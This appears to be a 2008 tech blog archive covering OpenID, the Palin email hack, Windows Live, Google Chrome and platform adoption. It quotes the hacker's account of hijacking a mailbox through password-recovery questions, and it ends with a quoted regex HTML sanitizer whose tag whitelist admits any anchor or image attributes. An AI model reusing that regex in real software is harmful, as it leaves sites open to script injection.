I have this dream that one day we will see true interoperability between social networking sites, potentially powered by OpenID. As part of trying to make this dream a reality, I've been reading a lot about the pros and cons of implementing OpenID, since a shared identity system is the cornerstone of any hope of getting interoperability to work across social networking sites. Here are some of the things I've learned.

The Problems OpenID Solves for Web Developers

There are two ways to approach using OpenID on your Web site.  The first way is to treat OpenID as a way to delegate user authentication on your site to another service. This means that you rely on someone else to authenticate (i.e. sign-in/log-in) the user and take their word for it that the user is who he/she claims to be. Some sites use this as the sole means of authenticating users (e.g. StackOverflow) while others give users the choice of either creating an account on the site or using an OpenID provider (e.g. SourceForge). The assumption behind this view of OpenID is that asking users to create yet another username/password combo for your site is a barrier to adoption and using OpenID removes this barrier. However this assumption is only correct if the OpenID sign-in process is easier for users than registering a new account on your site.

The second approach is to use OpenID as a way to give users of other Web sites access to features of your site that are traditionally only available to your users. For example, Google's Blogger has an option to enable anyone with an OpenID to comment on your blog. However, Blogger does not allow you to log in with OpenID; instead, you must have a valid Google account to create a blog on their service. In this scenario, the assumption is that asking users to create yet another username/password combo just to leave a comment on a blog or use some other feature of the site is too high a barrier to entry, but that same barrier to entry is acceptable for people who want to become full users of the site.

It should be noted that the second approach is actually why OpenID was originally invented, but scope creep has turned it into a popular choice as a single sign-on solution.

The Ideal OpenID User Experience

As a Web developer, the main problem OpenID is supposed to solve for you is reducing the barrier to using your service. This means that if redirecting a user to an OpenID provider to be authenticated, and then having the provider redirect the user back to your site, is more complicated than an account creation flow you could build on your site yourself, then using OpenID will cost you users. The ideal OpenID user experience should be:

  1. Your log-in page gives the user a choice of OpenID providers to use to sign in
  2. The user selects their OpenID provider from a list or enters their OpenID provider information
  3. The user is redirected to a log-in page on the provider's site
  4. User enters their credentials
  5. The user is redirected back to your site and is now logged in

Even in this ideal flow, there is a chance you will lose users since you have distracted them from their task of using your site by directing them to another site. The assumption here is that the redirect->sign-in->redirect flow is less cumbersome than asking new users to pick a unique username and password as well as asking them to solve a Human Interactive Proof or CAPTCHA. This sounds like a fair tradeoff although I'm not aware of any published research results that back up this assumption.
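
To make step 3 of the flow concrete, here is a minimal sketch of the redirect a relying party constructs using the OpenID 2.0 checkid_setup parameters. The provider endpoint and identifier below are placeholders; discovery of the endpoint and verification of the signed response that comes back in step 5 are jobs for a real OpenID library.

from urllib.parse import urlencode

RETURN_TO = "https://example.com/openid/return"   # step 5 lands back here
REALM = "https://example.com/"

def checkid_setup_url(provider_endpoint, claimed_id):
    # Build the URL the user's browser is redirected to in step 3.
    # provider_endpoint comes from discovery on the identifier entered
    # in step 2; discovery itself is omitted from this sketch.
    params = {
        "openid.ns": "http://specs.openid.net/auth/2.0",
        "openid.mode": "checkid_setup",
        "openid.claimed_id": claimed_id,
        "openid.identity": claimed_id,
        "openid.return_to": RETURN_TO,
        "openid.realm": REALM,
    }
    return provider_endpoint + "?" + urlencode(params)

# After the user signs in at the provider (step 4), the provider redirects
# the browser back to RETURN_TO with signed parameters that must be verified
# before the user is considered logged in (step 5).
print(checkid_setup_url("https://openid-provider.example.com/auth",
                        "https://openid-provider.example.com/users/alice"))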

However, if the OpenID sign-in flow is any more complicated than the above steps, then the risk of losing users increases significantly. Here is an example of how OpenID can cost you users, taken from a post by Ned Batchelder entitled OpenID is too hard:

Earlier this week I visited yet another site that encouraged me to get an OpenID, and I decided I would finally cross OpenID off my list of technologies I should at least understand and probably use.

The simplest way to use OpenID is to pick a provider like Yahoo, go to their OpenID page, and enable your Yahoo account to be an OpenID. This in itself was a little complicated, because when I was done, I got to a page that showed me my "OpenID identifiers", which had one item in it:

https://me.yahoo.com/a/.DuSz_IEq5Vw5NZLAHUFHWEKLSfQnRFuebro-

What!? What is that, what do I do with it? Am I supposed to paste that into OpenID fields on other sites? Are you kidding me? Also, in the text on that page is a stern warning:

This step is completely optional. After you choose an identifier, you cannot edit or delete it.

(Emphasis theirs). So now I have a mystifying string of junk, with a big warning all over it that I can't go back. "This step" claims it's optional, but I seem to have already done it! Now I'm afraid, and I'm a technical person — you expect my wife to do this?

How many users do you think start this process and complete it successfully? Now how many of these users would have been lost if the site in question had replaced their OpenID usage with a lightweight account creation process similar to that used by reddit.com which only requires username/password and solving a CAPTCHA?

This is food for thought when comparing the costs and benefits of adopting OpenID.

The Risks of Using OpenID

There are lots of commonly voiced criticisms about OpenID, a number of which are captured in the blog post entitled The problem(s) with OpenID by Stefan Brands. A few of the complaints are only interesting if you are a hardcore identity geek while others are of general interest to any Web developer considering adopting OpenID. Some of the key criticisms include:

  • Susceptibility to Phishing: The argument here is that the growing popularity of OpenID will train users into thinking that it is OK to enter their credentials on a "trusted site" after following a link from another Web site. However, given that this is exactly how phishing works, it also trains users to be more susceptible to phishing, since any random site can now claim to be powered by OpenID when in truth it redirects people to http://www.example.com/phishingattempt/yahoo.com/login or some similarly malicious URL.

    Given that we live in a world where the worse practice of Please Give Us Your Email Password is now commonplace, and the best solution people have come up with for dealing with it (OAuth) also utilizes browser-based redirection, I'm not sure this is a fair criticism of OpenID.

  • Identity Providers May Be Lax about Validating Users: When you outsource user authentication to an identity provider via OpenID, you are trusting that they perform some minimum level of user validation to keep spammers and bots out of their service. However, there is no requirement that they do so at all, nor is there any minimum standard that they have to meet. A year ago, Tim Bray posted an interesting thought experiment where he pointed out that one could create an identity provider that "successfully authenticated" any user URL you provided it with. You can imagine what kind of fun spammers would have with such an identity provider on a site like StackOverflow.

  • Identity Providers May Recycle Identities: A number of large email service providers like Yahoo! and AOL have decided to become OpenID identity providers. Email service providers typically recycle abandoned email accounts after a set period of time. For example, if I don't sign-in to my dare@example.com email address after three months then all my data is wiped and that account joins the pool of available email accounts. What happens to my accounts on other sites where I use that email address as my OpenID? Does this mean that the next person to use that email address can log-in to StackOverflow as me? Maybe…it depends on the quality of the identity provider.

  • Privacy Concerns: Delegating user authentication to another service means you are letting this other service know every time a user logs in to your site, and oftentimes what the user was trying to do, since you pass along a return URL. Depending on the sensitivity of your site, this may be information that you would rather not leak about your users. Then again, most Web developers don't care about this given how much information about their users they let Web analytics firms and advertising providers track.

White Lists are Key

The bottom line is that accepting any Tom, Dick and Harry as an identity provider on your site is probably a bad idea. User authentication is an important aspect of an online service, and delegating it to others without vetting them is not wise given how widely the user experiences and policies of various identity providers can vary. Developers should evaluate OpenID providers, then select a subset whose policies and sign-in experiences are compatible with their goals, to avoid the risk of losing or alienating users.
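
A minimal sketch of what such a white list check might look like before you even start the OpenID flow; the provider list and the host-based normalization are purely illustrative, since a real implementation would vet the provider endpoint discovered for the identifier rather than just the identifier's host.

from urllib.parse import urlparse

TRUSTED_PROVIDERS = {          # hosts whose policies you have actually vetted
    "me.yahoo.com",
    "openid.aol.com",
    "myopenid.com",
}

def is_trusted_identifier(openid_identifier):
    # Accept the identifier only if it points at a vetted provider
    # (the provider's own domain or one of its subdomains).
    host = (urlparse(openid_identifier).hostname or "").lower()
    return any(host == p or host.endswith("." + p) for p in TRUSTED_PROVIDERS)

print(is_trusted_identifier("https://me.yahoo.com/a/abc123"))     # True
print(is_trusted_identifier("https://evil.example.com/openid"))   # False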

Now Playing: The Game Ft. Ice Cube - State Of Emergency


 

Categories: Web Development

I recently read that Sarah Palin's Yahoo! email accounts had been hacked. What is interesting about the hack is that instead of guessing her password or finding a security flaw in Yahoo's email service, the hacker used the "forgot your ID or password" feature and a search engine. The Threat Level blog on Wired has posted an email from the hacker in a post entitled Palin E-Mail Hacker Says It Was Easy, which is excerpted below:

rubico 09/17/08(Wed)12:57:22 No.85782652

Hello, /b/ as many of you might already know, last night sarah palin’s yahoo was “hacked” and caps were posted on /b/, i am the lurker who did it, and i would like to tell the story.

In the past couple days news had come to light about palin using a yahoo mail account, it was in news stories and such, a thread was started full of newfags trying to do something that would not get this off the ground, for the next 2 hours the acct was locked from password recovery presumably from all this bullshit spamming.

after the password recovery was reenabled, it took seriously 45 mins on wikipedia and google to find the info, Birthday? 15 seconds on wikipedia, zip code? well she had always been from wasilla, and it only has 2 zip codes (thanks online postal service!)

the second was somewhat harder, the question was “where did you meet your spouse?” did some research, and apparently she had eloped with mister palin after college, if youll look on some of the screenshits that I took and other fellow anon have so graciously put on photobucket you will see the google search for “palin eloped” or some such in one of the tabs.

I found out later though more research that they met at high school, so I did variations of that, high, high school, eventually hit on “Wasilla high” I promptly changed the password to popcorn and took a cold shower…

The fundamental flaw of pretty much every password recovery feature I've found online is that what they consider "secret" information actually isn't, thanks to social networking, blogs and even Wikipedia. Yahoo! Mail password recovery relies on asking you for your date of birth, zip code and country of residence as proof of identity. Considering that this is the kind of information that is on the average Facebook profile or MySpace page, it seems ludicrous that this is all that stops someone from stealing your identity online.

Even the sites that try to be secure by asking more personal questions such as "the name of your childhood pet" or "where you met your spouse" fail, because people often write about their childhood pets and tell stories about how they met on wedding sites all over the Web.

Web developers need to start considering whether it isn't time to put password recovery features based on asking personal questions out to pasture. I wonder how many more high profile account hijackings it will take before this becomes as abhorred a practice as emailing users their forgotten passwords (you know why this is wrong, right?).
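
One alternative is to drop the personal questions entirely and instead email the address on file a single-use, time-limited reset link. The sketch below hand-waves storage and mail delivery (send_email is a stand-in), but shows the essential properties: the token is unguessable, it expires, and the server only ever stores a hash of it.

import hashlib, secrets, time

RESET_TTL_SECONDS = 30 * 60            # a reset link is only good for 30 minutes
pending_resets = {}                    # sha256(token) -> (user_id, expires_at)

def send_email(address, body):
    # stand-in for a real mail system
    print(f"(pretend this was emailed to {address}): {body}")

def start_password_reset(user_id, email_address):
    token = secrets.token_urlsafe(32)  # unguessable, single use
    token_hash = hashlib.sha256(token.encode()).hexdigest()
    pending_resets[token_hash] = (user_id, time.time() + RESET_TTL_SECONDS)
    # only the emailed link ever contains the raw token
    send_email(email_address, f"https://example.com/reset?token={token}")

def redeem_reset_token(token):
    token_hash = hashlib.sha256(token.encode()).hexdigest()
    user_id, expires_at = pending_resets.pop(token_hash, (None, 0.0))
    if user_id is None or time.time() > expires_at:
        return None                    # unknown, already used, or expired
    return user_id                     # caller now lets this user set a new password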

Now Playing: DJ Khaled - She's Fine (Feat. Sean Paul, Missy Elliot & Busta Rhymes)


 

Categories: Web Development

Chris Jones has a blog post entitled Building Windows Live where he talks about what all of us on Windows Live have been working on over the past year. He writes:

We have spent the last year working on our next major wave of releases for Windows Live. This wave is part of our ongoing work to build a great set of communication and sharing experiences that help keep your life in sync. This wave includes significant updates to our software applications for your Windows PC, and in the next few hours, we will release public betas of the latest version of the Windows Live suite of PC applications, including Messenger, Mail, Photo Gallery, Movie Maker, Writer, Toolbar, and Family Safety. You’ll find new features across the products and most notably, Windows Live Messenger has been almost entirely redesigned. I’m sure many of you will have questions, and, over the coming weeks, we’ll have individuals from the engineering team share more about what we have built and why we made the investments we made. Our intent is to post regularly to this blog, and if there are topics you think we should cover, please leave a comment or send me an e-mail at chris.jones@microsoft.com.

It seems the download links were found early by those intrepid correspondents over at LiveSide and a number of people have already started trying the new versions out. The download URLs are http://g.live.com/1rebeta3/en/wlsetup-web.exe and http://g.live.com/1rebeta3/en/wlsetup-all.exe depending on whether you want to download a subset of the Windows Live desktop applications or all of them.

I probably won't be blogging in detail about what I've worked on over the past few months until the products are out of beta, but I will leave you with this screenshot from Darren Neimke's post Loving the new Live Beta’s.

I'm sure you can guess which of the features called out above I worked on.

PS: My favorite thing about the new wave of Windows Live products is that the world now has a seamless calendar sharing solution that works. If Omar doesn't write something similar first, I'll probably throw a blog up about how my wife and I plan to use Outlook + Outlook Connector and Windows Live Mail + Windows Live Calendar to share our schedules so I no longer miss birth center appointments. :)

Now Playing: DJ Khaled - Go Hard (Feat. Kanye West & T-Pain)


 

Categories: Windows Live

September 15, 2008
@ 04:12 PM

A few weeks ago Google released the beta of Google Chrome, a new Web browser based on WebKit. Since then there has been a lot of interesting hype and backlash against the hype about Chrome. Two great examples of the hype and the corresponding backlash are Mike Arrington's Meet Chrome, Google’s Windows Killer and Ted Dziuba's article Chrome-fed Googasm bares tech pundit futility in response.

The best way to think about Google Chrome is to understand how Google thinks about the Web. Nick Carr has a post entitled The Omnigoogle which does a great job of capturing a sentiment I've seen expressed by every Google employee I've ever talked to, from senior people like Sergey Brin and Vint Cerf to front line folks like DeWitt Clinton and Kevin Marks. Nick Carr writes:

But while Google is an unusual company in many ways, when you boil down its business strategy, you find that it’s not quite as mysterious as it seems. The way Google makes money is straightforward: It brokers and publishes advertisements through digital media. More than 99 percent of its sales have come from the fees it charges advertisers for using its network to get their messages out on the Internet.

Google’s protean appearance is not a reflection of its core business. Rather, it stems from the vast number of complements to its core business. Complements are, to put it simply, any products or services that tend be consumed together. Think hot dogs and mustard, or houses and mortgages. For Google, literally everything that happens on the Internet is a complement to its main business. The more things that people and companies do online, the more ads they see and the more money Google makes. In addition, as Internet activity increases, Google collects more data on consumers’ needs and behavior and can tailor its ads more precisely, strengthening its competitive advantage and further increasing its income. As more and more products and services are delivered digitally over computer networks — entertainment, news, software programs, financial transactions — Google’s range of complements expands into ever more industry sectors. That's why cute little Google has morphed into The Omnigoogle.

Because the sales of complementary products rise in tandem, a company has a strong strategic interest in reducing the cost and expanding the availability of the complements to its core product. It’s not too much of an exaggeration to say that a company would like all complements to be given away. If hot dogs became freebies, mustard sales would skyrocket. It’s this natural drive to reduce the cost of complements that, more than anything else, explains Google’s strategy.

This boils down to the corporate ideology that "anything that is good for the Web is good for Google". This means Google is in favor of anything that increases the breadth of the Web, which explains why it is investing in O3b Networks in an effort to bring the Web to 3 billion people in emerging markets. The more people there are using the Web, the more people there are viewing ads on Google's services and on pages of sites that use AdSense and DoubleClick ads. This also means that Google is in favor of moving as much media consumption as possible to the Web. This explains why purchasing YouTube was so important. In addition to purchasing the number one video site on the Web, Google also ensured that it would be on the front line of defending video on the Web, given that YouTube was in the cross hairs of various corporate content owners. This focus on expanding the breadth of the Web also explains why Google has purchased startups like Zenter, Upstartle and 2Web Technologies to create a Google office suite in an attempt to unseat the current breed of desktop based office productivity software. It explains why Google created Gmail as a way to make Web-based email as satisfying or even more satisfying than desktop mail experiences, especially when compared to other Webmail offerings at the time. This ideology also explains why the company invests in Android, and so on.

The media has tried to make it seem like Google spits out a bunch of random, unfocused projects without much thought besides "shipping something cool". However, this is far from the case. Google is the most successful company on the Web, and it believes that its fortunes are directly tied to the increased usage and evolution of the Web. This means Google has a strong incentive to improve the capabilities of the Web as a delivery vehicle for user experiences. Google had telegraphed its intent to take a more direct role in the evolution of Web technologies in a few ways. For one, the company hired Ian Hickson, who had been rallying browser vendors to start improving Web technologies like HTML via the Web Hypertext Applications Technology Working Group (WHAT WG). His success in these efforts since joining Google has led to HTML 5 becoming an official W3C effort. Secondly, Google also heavily supported Firefox, both by hiring developers who worked on Firefox full time and via a search affiliate program that brings in millions for the Mozilla Corporation [Ed note – Google has a similar deal with Opera]. However, the relationship with Firefox clearly was not evolving the Web at a pace that Google found satisfactory, as evidenced by the creation of Google Gears, a product which Google evangelists have positioned as a bleeding edge HTML 5 implementation even though it implements capabilities not mentioned in HTML 5.

However, even with a seat at the table in defining HTML 5 and being a significant sponsor of the second most popular Web browser, Google still did not have a way to push the evolution of the Web directly to users. They were still dependent on the pace of innovation of incumbent browser vendors, or on figuring out how to distribute a browser plug-in by convincing companies like MySpace to take a dependency on it. This was clearly an uphill battle. Thus creating their own Web browser was inevitable.

So why is this significant? It isn't because "Google Chrome is going to replace Windows" or some other such silliness. As it stands now, Google Chrome is a Windows-based application whose most interesting features exist in other browsers. A Web browser cannot replace an operating system any more than an automobile can replace an Interstate highway. The significant end user innovation in Google Chrome is that it is bundled with Google Gears. This means that Google Chrome has a mechanism for delivering richer experiences to end users out of the box. Google can now use this as a carrot-and-stick approach to convincing browser vendors to do what it wants. Google can make its sites work better with Chrome + Gears (e.g. the YouTube Uploader using Gears), which could lead to lost browser market share for competing browser vendors if this becomes a widespread practice among Google's offerings. Even if Google never does this, the implied threat is now out there.

Chrome will likely force Google's competitors to up their game with regards to adopting newer Web standards and features just to stay competitive. This is similar to what Google did with online mapping and Web mail, and what the Opera browser has been doing by pioneering features like "pr0n mode" and tabbed browsing. So even if Google loses because Chrome doesn't get massively popular, Google still wins because the user experience for browsing the Web has been improved. And at the end of the day, if more people are using the Web because the user experience is better across the board, that's just fine for Google, in the same way that the across-the-board improvement in online mapping and Web mail experiences has also been good for Google.

Now Playing: Metallica - The Judas Kiss


 

With the releases of betas of Google Chrome and Internet Explorer 8 as well as the recent release of Firefox 3, the pundits are all in a tizzy about the new browser wars. I don't know if it is a war or not, but I do like the fact that in the past few months we've seen clear proof that the end user experience when browsing the Web is going to get an upgrade for the majority of Web users.

Whenever there is such active competition between vendors, customers are typically the ones that benefit, and the "new browser wars" are no different. Below are some of the features and trends in the new generation of browsers that have me excited about the future of the Web browsing user experience.

One Process Per Tab

As seen in: IE 8 beta, Chrome

With this feature, browsers are more resilient to crashes since each tab has its own process; a bug that would cause the entire browser to crash in an old school browser only causes the user to lose that tab in a next generation browser. This feature is called Loosely Coupled IE (LCIE) in Internet Explorer 8 and is described in the documentation of the Chrome Process Manager in the Google Chrome Comic Book.

This feature will be especially welcome for users of add-ons and browser toolbars, since the IE team has found that up to 70% of browser crashes are caused by extensions, and now these crashes will no longer take down the entire browser.
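
The idea is easy to demonstrate outside of a browser: if each "tab" is its own OS process, a crash in one of them only costs you that process. A toy illustration (the crash is simulated with an abrupt exit):

import multiprocessing as mp
import os

def render_tab(url):
    # stand-in for a renderer process; one of them "crashes"
    if "buggy" in url:
        os._exit(139)                  # die abruptly, as a crashing extension would
    print(f"rendered {url} in pid {os.getpid()}")

if __name__ == "__main__":
    tabs = {url: mp.Process(target=render_tab, args=(url,))
            for url in ["http://example.com", "http://buggy.example.com"]}
    for proc in tabs.values():
        proc.start()
    for url, proc in tabs.items():
        proc.join()
        status = "ok" if proc.exitcode == 0 else f"crashed (exit code {proc.exitcode})"
        print(f"tab {url}: {status}")  # only the crashed tab is lost, not the browser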

Smarter Address Bars

As seen in: IE 8 beta, Chrome, Firefox 3

Autocomplete in browser address bars has been improved. Instead of trying to match a user-entered string as the start of a URL (e.g. "cn" autocompletes to http://cnn.com), newer browsers match any occurrence of the string in previously seen URLs and page titles (e.g. "cn" matches http://cnn.com, http://google.cn and a blog post on Wordpress with the title "I've stopped watching CNN"). Like Mark Pilgrim, I was originally suspicious of this feature but now cannot live without it.

This feature is called AwesomeBar in Firefox 3, OmniBox in Google Chrome and Smart Address Bar in IE 8.
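
The change in matching behavior is simple to express in code: instead of a prefix match on URLs, match the typed text anywhere in the URL or the page title of your history entries. A rough sketch (a real browser would also rank results by how frequently and recently they were visited):

history = [
    ("http://cnn.com", "CNN - Breaking News"),
    ("http://google.cn", "Google China"),
    ("http://example.wordpress.com/cnn", "I've stopped watching CNN"),
    ("http://msdn.microsoft.com", "MSDN Home"),
]

def suggest(typed, entries, limit=5):
    needle = typed.lower()
    hits = [(url, title) for url, title in entries
            if needle in url.lower() or needle in title.lower()]
    # a real browser would rank these by "frecency" (frequency + recency)
    return hits[:limit]

print(suggest("cn", history))   # matches all three "cn" entries, not just cnn.com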

Restoring Previous Browsing Sessions

As seen in: Firefox 3, Chrome, IE 8 beta

I love being able to close my browser and restart my operating system safe in the knowledge that whenever I launch the browser it is restored to exactly where I left off. Both Firefox and Chrome provide an option to make this behavior the default, but the closest I've seen to getting a similar experience in the betas of IE 8 requires a click from the "about:Tabs" page. However, given that "about:Tabs" is my start page, this gives maximum flexibility since I am not slowed down by opening the four or five previously open browser tabs every time I launch my browser.
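
Under the hood this amounts to persisting the list of open tabs on exit and reading it back on launch, something like the sketch below (the file location and format are illustrative):

import json, os

SESSION_FILE = os.path.expanduser("~/.mybrowser_session.json")

def save_session(open_tab_urls):
    # called when the browser shuts down cleanly
    with open(SESSION_FILE, "w") as f:
        json.dump({"tabs": open_tab_urls}, f)

def restore_session():
    # called on the next launch
    try:
        with open(SESSION_FILE) as f:
            return json.load(f).get("tabs", [])
    except (FileNotFoundError, ValueError):
        return []          # no saved session (or a corrupt one): start fresh

save_session(["http://cnn.com", "about:Tabs"])
print(restore_session())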

Search Suggestions

As seen in: IE 8 beta, Chrome, Firefox 3

In the old days, the only way to get search suggestions when typing a search query in your browser's search box was if you had a vendor-specific search toolbar installed (e.g. Google Suggest for Firefox). It is becoming more commonplace for this to be native functionality of the Web browser. Google Chrome supports this if the default search provider is Google. IE 8 beta goes one better by making this feature a platform that any search engine can plug into, and as of this writing it provides search suggestions for the following search providers: Wikipedia, Amazon, Google, Live Search and Yahoo!

Updated: Firefox has also supported search suggestions using a provider model since Firefox 2 via OpenSearch and ships with suggestions enabled for Google and Yahoo! by default.
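
The Firefox provider model, for example, is built on the OpenSearch suggestions convention: the browser requests a suggestion URL with the partial query and gets back a small JSON array whose first element echoes the query and whose second is a list of completions. A sketch of the consuming side, with a placeholder endpoint:

import json
from urllib.parse import quote
from urllib.request import urlopen

SUGGEST_URL = "https://search.example.com/suggest?q={query}"   # placeholder endpoint

def fetch_suggestions(partial_query):
    url = SUGGEST_URL.format(query=quote(partial_query))
    with urlopen(url) as resp:
        payload = json.load(resp)
    # OpenSearch suggestions JSON: [echoed query, [completions], ...optional extras]
    return payload[1]

# e.g. fetch_suggestions("cn") might return ["cnn", "cnn news", "cnet"]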

Offline Support

As seen in: Chrome, IE 8 beta, Firefox 3

The WHAT WG created specifications which describe secure mechanisms for Web applications to store large amounts of user data on a local system using APIs provided by modern Web browsers. Applications can store megabytes of data on the user's local machine and have it accessible via the DOM. This feature was originally described in the Web Applications 1.0 specification and is typically called DOM Storage. You can read more about it in the Mozilla documentation for DOM Storage and the IE 8 beta documentation for DOM Storage. The related APIs are currently being defined as part of HTML 5.

Chrome supports this functionality by bundling Google Gears which is a Google defined set of APIs for providing offline storage. 


The most interesting thing about this list is that if you follow the pronouncements from various pundits on sites like Techmeme, you'd think all of these features were originated by Google and appeared for the first time in Chrome.

Update: An amusing take on the pundit hype about Google Chrome from Ted Dziuba in The Register article Chrome-fed Googasm bares tech pundit futility

Now Playing: Metallica - Cyanide


 

Categories: Technology | Web Development

I've been thinking a lot about platform adoption recently. I guess it is the combination of the upcoming Microsoft PDC and watching the various moves in the area of social networking platforms like OpenSocial and fbOpen. One thing that is abundantly clear is that the dynamics that drive platform adoption are amazingly consistent regardless of whether you are talking about operating system platforms like Windows' Win32 and *nix's POSIX, cloud computing platforms like Amazon's EC2 + EBS + S3 and Google App Engine, or even data access APIs like the Flickr API and Google's GData.

When a developer adopts a platform, there is a value exchange between the developer and the software vendor. The more value that is provided to developers by the platform vendor, the more developers are attracted to the platform. Although this seems self-evident, where providers of platforms go astray is that they often don't understand the value developers actually want out of software platforms and instead operate from an "if we build it, they will come" mentality.

There are three main benefits that adopting one platform over another can offer a developer. These benefits are captured in the following "laws" of platform adoption:

  1. Developers adopt a platform when it offers differentiation from competitors: In competitive software markets, building an application that stands out from the crowd is important. Platforms or technologies that enable developers to provide features that are unique to the application, even just temporarily, are thus valuable to developers in such markets. Typically, if these features are truly valuable to end users, this leads to a "keeping up with the Joneses" effect where the majority of applications in that space eventually adopt the platform. Recent examples of this include Flash video, AJAX and the Flickr API.

  2. Developers adopt a platform when it reduces the cost of software development: Building software is a labor intensive, complicated and error prone process which often results in failure. This makes software development an expensive undertaking. Platforms which reduce the cost of development are thus very valuable to developers. Platforms like Java and the .NET Framework reduced the cost of software development compared to building applications using C and C++. In recent years, platforms based on dynamic languages such as Ruby On Rails and Django have become increasingly popular for building Web applications as they offer simpler development options compared to using "enterprise" platforms like Java.

  3. Developers adopt a platform when it provides reach and/or better distribution: Every platform choice places a limit on which users the developer can reach. Building a Facebook application limits you to building applications for Facebook users, building an iPhone application limits you to people running Apple's phone and building an AJAX application limits you to users of modern browsers who don't have JavaScript disabled. In all of the aforementioned cases, the reach of the application platform is in the millions of users. Additionally, in all of the aforementioned cases there are alternative platforms that developers could choose that do not have as many addressable end users and thus have less reach.

    Distribution is another value add that modern platforms have begun to offer, which augments the reach of the platform. The Facebook platform offers several viral distribution mechanisms which enable applications to get noticed by end users and spread organically without explicit action by the developer. The Apple iPhone has the App Store, which is the single, well-integrated entry point for users to discover and purchase applications for the device. Thus even though the iPhone may have fewer users than other smart phone platforms, targeting the iPhone may still be more attractive than targeting other platforms due to its superior distribution channel for applications.

Sometimes developers adopt platforms due to external effects such as management mandate or peer pressure but even in these cases the underlying justification is usually one or more of the benefits above. These laws mean different things for the various participants in the software ecosystem.

  • For software vendors, they clarify that delivering a software platform isn't just about delivering a technology or a set of APIs. The value proposition to developers with regards to the three laws of adoption must be clearly shown to get developers to accept the platform. Smart platform vendors should pick one or more of these axes as the value proposition of their platform and hammer it home. Good examples of these approaches include how Google has been hammering home the 'reach' benefit of adopting OpenSocial, or how Erlang evangelists have been pitching it as a solution to the multicore crisis given that building concurrent applications is still an expensive endeavor in today's popular programming languages.

  • For developers, they explain how to evaluate a platform and why some platforms get traction among their peers while others do not. So if you are a fan of Common Lisp or the Pownce API, these laws of platform adoption explain why developers have flocked to other platforms in their stead.

Now Playing: Pink - So What


 

Categories: Platforms | Programming

Update: A blog post on the official Google blog entitled A fresh take on the browser states that the comic book went out early. It was supposed to show up tomorrow in tandem with the launch of the beta of Google Chrome which will be available in over 100 countries.

Phillipp Lessen was sent an announcement in the form of a comic book which gives the details of an upcoming open source browser project from Google. He gives the details and links to scanned images of the comic in his post Google Chrome, Google’s Browser Project. His site seems to have been running slow, so he took down the links to the scans. I managed to grab them and have uploaded them to a folder on Windows Live SkyDrive. The link is embedded below and the comic can be accessed directly from here.

The key features of Chrome according to the comic are:

  • Based on WebKit
  • Each browser tab gets its own process, and JavaScript execution happens in parallel across tabs instead of being single threaded across the entire browser as it is in most modern browsers. This also solves a lot of memory problems with modern browsers, since it reduces memory fragmentation and mitigates the impact of memory leaks because all memory is reclaimed when the offending Web site's browser tab is closed.
  • A task manager shows how many resources each tab is using, so you can tie resource usage to individual Web pages.
  • A JavaScript VM created from scratch, with clever optimizations like just-in-time compilation and incremental garbage collection.
  • Each tab has its own URL box and can effectively be considered its own browser window.
  • OmniBox URL bar is similar to AwesomeBar in Firefox 3 and the smart address bar in IE 8.
  • Instead of "about:blank" the default homepage shows our nine most visited Web pages and four most used search engines
  • Has an incognito mode where no browser history is saved and cookies are wiped out when the browser is closed. Some people have affectionately dubbed such features pr0n mode. Amusingly, the comic uses the same "planning a surprise birthday party" scenario that the Internet Explorer team used when describing a similar feature in IE 8. 
  • Pop ups are not modal and scoped to the tab which they were spawned from. However they can be promoted to becoming their own tab.
  • There is a "streamlined" mode where the URL box and browser toolbar are hidden so only the Web page is visible.
  • Web pages are sandboxed so that if the user hits a malware site it cannot access the user's computer and perform drive-by downloads or installations.
  • The sandbox model is broken by browser plugins (e.g. Flash) but this is mitigated by having the plugin execute in its own separate process that is different from that of the browser's rendering engine.
  • The browser will continuously phone home to Google to get a list of known malware sites so that the user is warned when they are visited.
  • Will ship with Google Gears built-in

My initial thoughts on this are that this is a smart move on Google's part. Google depends on the usage and advancement of the Web for its success. However, how quickly the Web advances is in the hands of browser vendors, which probably doesn't sit well with them; that is why they created Gears in the first place and hired the guy driving HTML 5. Chrome now gives them an even larger say in which way the Web goes.

As for its relationship with Firefox, it may be mutually beneficial financially, since Mozilla gets paid while Google gets to be the search default in a popular browser, but it doesn't mean Google can dictate Mozilla's technical direction. With Chrome, Google has a way to force browser vendors to move the Web forward on its terms, even if it is just by getting users to demand the features that exist in Chrome.

PS: Am I the only one that thinks that Google is beginning to fight too many wars on too many fronts? Android (Apple), OpenSocial (Facebook), Knol (Wikipedia), Lively (IMVU/SecondLife), Chrome (IE/Firefox), and that's just in the past year.

Now Playing: Boys Like Girls - Thunder


 

I'm often surprised by how common it is for developers to prefer reinventing the wheel to using off-the-shelf libraries when solving problems. This practice isn't limited to newbies who don't know any better; it extends to experienced developers who should. Experienced developers often make excuses about not wanting to take unnecessary dependencies or not trusting the code of others when justifying reinventing the wheel. For example, take this conversation that flowed through my Twitter stream yesterday:

Jon Galloway
jongalloway: @codinghorror Oh, one last thing - I'd rather trust the tough code (memory management, SSL, parsing) to experts and common libraries. about 11 hours ago from Witty in reply to codinghorror

Jeff Atwood
codinghorror @jongalloway you're right, coding is hard. Let's go shopping! about 12 hours ago from web in reply to jongalloway

Jeff Atwood
codinghorror @jongalloway I'd rather make my own mistakes (for things I care about) than blindly inherit other people's mistakes. YMMV. about 12 hours ago from web in reply to jongalloway

The background on this conversation is that Jeff Atwood (aka codinghorror) recently decided to quit his job and create a new Website called stackoverflow.com. It is a question and answer site for asking programming questions where users can vote on the best answers to specific questions. You can think of it as Yahoo! Answers but dedicated to programming questions. You can read a review of the site by Michiel de Mare for more information.

Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions: Now You Have Two Problems, where he wrote:

I'd like to illustrate with an actual example, a regular expression I recently wrote to strip out dangerous HTML from input. This is extracted from the SanitizeHtml routine I posted on RefactorMyCode.

var whitelist =
 @"</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
  </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
  </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
  </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>";

What do you see here? The variable name whitelist is a strong hint. One thing I like about regular expressions is that they generally look like what they're matching. You see a list of HTML tags, right? Maybe with and without their closing tags?

